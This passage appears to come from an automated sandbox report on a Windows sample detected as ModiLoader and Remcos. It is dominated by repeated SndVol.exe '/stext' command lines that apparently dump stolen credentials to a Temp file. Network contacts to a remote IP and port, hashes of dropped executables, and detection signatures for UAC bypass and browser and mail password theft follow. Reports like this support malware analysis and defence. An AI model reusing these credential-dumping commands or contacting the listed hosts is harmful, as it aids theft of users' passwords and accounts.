C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 1010.filemail.com | udp |
| US | 23.237.50.106:443 | 1010.filemail.com | tcp |
| US | 23.237.50.106:443 | 1010.filemail.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 192.3.101.8:55677 | tcp | |
| US | 192.3.101.8:55677 | tcp | |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| N/A | 127.0.0.1:45671 | tcp | |
| N/A | 127.0.0.1:55677 | tcp |
Files
\Users\Public\alpha.exe
| MD5 | 5746bd7e255dd6a8afa06f7c42c1ba41 |
| SHA1 | 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8 |
| SHA256 | db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386 |
| SHA512 | 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e |
C:\Users\Public\xkn.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2676-21-0x000000001B510000-0x000000001B7F2000-memory.dmp
memory/2676-22-0x0000000001D20000-0x0000000001D28000-memory.dmp
memory/2676-23-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp
memory/2676-24-0x0000000002C00000-0x0000000002C80000-memory.dmp
memory/2676-25-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp
memory/2676-26-0x0000000002C00000-0x0000000002C80000-memory.dmp
memory/2676-32-0x0000000002C00000-0x0000000002C80000-memory.dmp
memory/2676-33-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp
\Users\Public\kn.exe
| MD5 | ec1fd3050dbc40ec7e87ab99c7ca0b03 |
| SHA1 | ae7fdfc29f4ef31e38ebf381e61b503038b5cb35 |
| SHA256 | 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3 |
| SHA512 | 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2 |
C:\Users\Public\Lewxa.txt
| MD5 | 8f6b3132069a25963b93083743e160dd |
| SHA1 | 364112fc579f11dfa82a3c1078ec19706cd6dfda |
| SHA256 | 5184b2c7c5ffbaf8b8c9bac27545f09447b61d619a2f2bf472570b9ebec5747c |
| SHA512 | af3051aeed9de9931f12d48cd22fef3273f9350a1cdd3c476fa02f7550288f7a96112f311d4dadcf61f0a67c93c22ce2999fb6253c8841b9d399e710b8518938 |
C:\Users\Public\Libraries\Lewxa.com
| MD5 | 04aba5a372c8dac9affd6f1578b478b3 |
| SHA1 | 1e0d764539cbf2e86e0d59b83f407b429f61fdb7 |
| SHA256 | b27a5e00f3339d8020da21dabc1c53e001bf5d4a809c47cee65f3e9383568411 |
| SHA512 | 4d69053814b86bd13b59ca8b147a5331d0eace3ed2aaa936dc35086fdba8ef44d757bdc788eec61338f443578f98b8859f8dd7c7eeef486cab9ecb8eb5be15a3 |
memory/2516-48-0x00000000002C0000-0x00000000002C1000-memory.dmp
memory/2516-54-0x0000000003170000-0x0000000004170000-memory.dmp
memory/2516-56-0x0000000003170000-0x0000000004170000-memory.dmp
memory/2516-58-0x00000000002C0000-0x00000000002C1000-memory.dmp
memory/2516-59-0x0000000000400000-0x0000000000527000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\TarAE5E.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Windows \System32\6614357.exe
| MD5 | 231ce1e1d7d98b44371ffff407d68b59 |
| SHA1 | 25510d0f6353dbf0c9f72fc880de7585e34b28ff |
| SHA256 | 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96 |
| SHA512 | 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612 |
memory/1892-122-0x0000000000900000-0x0000000000901000-memory.dmp
memory/1808-138-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-140-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-141-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-142-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-143-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-145-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-147-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-148-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-149-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-150-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-152-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/17860-158-0x0000000000400000-0x0000000000424000-memory.dmp
memory/17860-156-0x0000000000400000-0x0000000000424000-memory.dmp
memory/17860-161-0x0000000000400000-0x0000000000424000-memory.dmp
memory/17860-160-0x0000000000400000-0x0000000000424000-memory.dmp
memory/17860-159-0x0000000000400000-0x0000000000424000-memory.dmp
memory/17860-154-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1808-163-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-164-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/33896-173-0x0000000000400000-0x0000000000424000-memory.dmp
memory/33896-172-0x0000000000400000-0x0000000000424000-memory.dmp
memory/33896-166-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/49952-182-0x0000000000400000-0x0000000000424000-memory.dmp
memory/49952-181-0x0000000000400000-0x0000000000424000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 467205ad28a624cda8f0bfcc4f2ae859 |
| SHA1 | d38ed23e91e567c0bec1934740ad531cf62483f7 |
| SHA256 | cdbbe2bc3c83a3de7b0e9880e027281852f150552ef0d02e247d2b0052cc8e30 |
| SHA512 | 84c83c60c43c4347c51c0051fc80fd93354a862d9c81aa12ac63d1632cce472d7d8874f19cd0976a9de046a2bd8063474d26f7b5101b664de825036e135cbc47 |
memory/66016-184-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/66016-190-0x0000000000400000-0x0000000000424000-memory.dmp
memory/81980-198-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1808-201-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/1808-202-0x00000000004C0000-0x00000000014C0000-memory.dmp
memory/98032-208-0x0000000000400000-0x0000000000424000-memory.dmp
memory/98032-210-0x0000000000400000-0x0000000000424000-memory.dmp
memory/66016-219-0x0000000000400000-0x0000000000424000-memory.dmp
memory/114036-218-0x0000000000400000-0x0000000000424000-memory.dmp
memory/130084-228-0x0000000000400000-0x0000000000424000-memory.dmp
memory/146144-236-0x0000000000400000-0x0000000000424000-memory.dmp
memory/146144-237-0x0000000000400000-0x0000000000424000-memory.dmp
memory/162196-245-0x0000000000400000-0x0000000000424000-memory.dmp
memory/162196-247-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1808-254-0x000000001A0E0000-0x000000001A0F9000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-27 02:42
Reported
2024-03-27 02:45
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
ModiLoader, DBatLoader
Remcos
Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables built or packed with MPress PE compressor
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many email and collaboration clients. Observed in information stealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Users\Public\xkn.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Lewxa.com | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows \System32\5815154.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows \System32\5815154.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
